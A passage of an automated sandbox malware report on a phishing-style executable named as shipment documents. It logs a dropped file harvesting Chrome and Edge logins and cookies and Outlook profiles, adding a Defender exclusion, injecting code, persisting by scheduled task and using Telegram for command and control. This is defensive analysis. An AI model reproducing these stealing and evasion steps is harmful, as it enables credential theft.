              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeQueries volume information: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeQueries volume information: C:\Users\user\AppData\Roaming\PKjWaa.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeQueries volume information: C:\Users\user\AppData\Roaming\PKjWaa.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000014.00000002.3705314207.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.3706006228.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 20.2.PKjWaa.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.PKjWaa.exe.3e9b608.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.PKjWaa.exe.3e9b608.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000014.00000002.3705314207.0000000002E75000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.3706006228.00000000032A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.1323725157.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1282291335.0000000003D38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1282291335.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: MARCH SHIPMENT PLAN DOCS.exe PID: 6276, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: MARCH SHIPMENT PLAN DOCS.exe PID: 7256, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: PKjWaa.exe PID: 7368, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: PKjWaa.exe PID: 7948, type: MEMORYSTR
              Source: Yara matchFile source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.PKjWaa.exe.3e9b608.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.PKjWaa.exe.3e9b608.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000A.00000002.3702417475.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.1323725157.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1282291335.0000000003D38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1282291335.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: MARCH SHIPMENT PLAN DOCS.exe PID: 6276, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: MARCH SHIPMENT PLAN DOCS.exe PID: 7256, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: PKjWaa.exe PID: 7368, type: MEMORYSTR
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: Yara matchFile source: 20.2.PKjWaa.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.PKjWaa.exe.3e9b608.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.PKjWaa.exe.3e9b608.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000014.00000002.3702397792.000000000043A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.1323725157.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1282291335.0000000003D38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1282291335.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: MARCH SHIPMENT PLAN DOCS.exe PID: 6276, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: MARCH SHIPMENT PLAN DOCS.exe PID: 7256, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: PKjWaa.exe PID: 7368, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: PKjWaa.exe PID: 7948, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000014.00000002.3705314207.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.3706006228.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 20.2.PKjWaa.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.PKjWaa.exe.3e9b608.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.PKjWaa.exe.3e9b608.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000014.00000002.3705314207.0000000002E75000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.3706006228.00000000032A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.1323725157.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1282291335.0000000003D38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1282291335.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: MARCH SHIPMENT PLAN DOCS.exe PID: 6276, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: MARCH SHIPMENT PLAN DOCS.exe PID: 7256, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: PKjWaa.exe PID: 7368, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: PKjWaa.exe PID: 7948, type: MEMORYSTR
              Source: Yara matchFile source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.PKjWaa.exe.3e9b608.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.PKjWaa.exe.3e9b608.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000A.00000002.3702417475.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.1323725157.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1282291335.0000000003D38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1282291335.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: MARCH SHIPMENT PLAN DOCS.exe PID: 6276, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: MARCH SHIPMENT PLAN DOCS.exe PID: 7256, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: PKjWaa.exe PID: 7368, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Scheduled Task/Job
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              11
              Disable or Modify Tools
              1
              OS Credential Dumping
              1
              File and Directory Discovery
              Remote Services11
              Archive Collected Data
              1
              Web Service
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              Scheduled Task/Job
              111
              Process Injection
              1
              Deobfuscate/Decode Files or Information
              LSASS Memory13
              System Information Discovery
              Remote Desktop Protocol1
              Data from Local System
              3
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              Scheduled Task/Job
              31
              Obfuscated Files or Information
              Security Account Manager1
              Query Registry
              SMB/Windows Admin Shares1
              Email Collection
              11
              Encrypted Channel
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
              Software Packing
              NTDS11
              Security Software Discovery
              Distributed Component Object ModelInput Capture4
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Timestomp
              LSA Secrets1
              Process Discovery
              SSHKeylogging15
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials31
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Masquerading
              DCSync1
              Application Window Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
              Virtualization/Sandbox Evasion
              Proc Filesystem1
              System Network Configuration Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
              Process Injection
              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1629837 Sample: MARCH SHIPMENT PLAN DOCS.exe Startdate: 05/03/2025 Architecture: WINDOWS Score: 100 52 reallyfreegeoip.org 2->52 54 api.telegram.org 2->54 56 2 other IPs or domains 2->56 58 Suricata IDS alerts for network traffic 2->58 60 Found malware configuration 2->60 62 Malicious sample detected (through community Yara rule) 2->62 68 12 other signatures 2->68 8 MARCH SHIPMENT PLAN DOCS.exe 7 2->8         started        12 PKjWaa.exe 5 2->12         started        signatures3 64 Tries to detect the country of the analysis system (by using the IP) 52->64 66 Uses the Telegram API (likely for C&C communication) 54->66 process4 file5 38 C:\Users\user\AppData\Roaming\PKjWaa.exe, PE32 8->38 dropped 40 C:\Users\user\...\PKjWaa.exe:Zone.Identifier, ASCII 8->40 dropped 42 C:\Users\user\AppData\Local\...\tmp4DEC.tmp, XML 8->42 dropped 44 C:\Users\...\MARCH SHIPMENT PLAN DOCS.exe.log, ASCII 8->44 dropped 70 Adds a directory exclusion to Windows Defender 8->70 72 Injects a PE file into a foreign processes 8->72 14 powershell.exe 23 8->14         started        17 MARCH SHIPMENT PLAN DOCS.exe 15 2 8->17         started        20 powershell.exe 23 8->20         started        26 2 other processes 8->26 74 Multi AV Scanner detection for dropped file 12->74 22 PKjWaa.exe 12->22         started        24 schtasks.exe 12->24         started        signatures6 process7 dnsIp8 76 Loading BitLocker PowerShell Module 14->76 28 conhost.exe 14->28         started        30 WmiPrvSE.exe 14->30         started        46 checkip.dyndns.com 193.122.130.0, 49701, 49705, 49709 ORACLE-BMC-31898US United States 17->46 48 reallyfreegeoip.org 104.21.32.1, 443, 49706, 49708 CLOUDFLARENETUS United States 17->48 32 conhost.exe 20->32         started        50 api.telegram.org 149.154.167.220, 443, 49858, 49869 TELEGRAMRU United Kingdom 22->50 78 Tries to steal Mail credentials (via file / registry access) 22->78 80 Tries to harvest and steal browser information (history, passwords, etc) 22->80 34 conhost.exe 24->34         started        36 conhost.exe 26->36         started        signatures9 process10

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.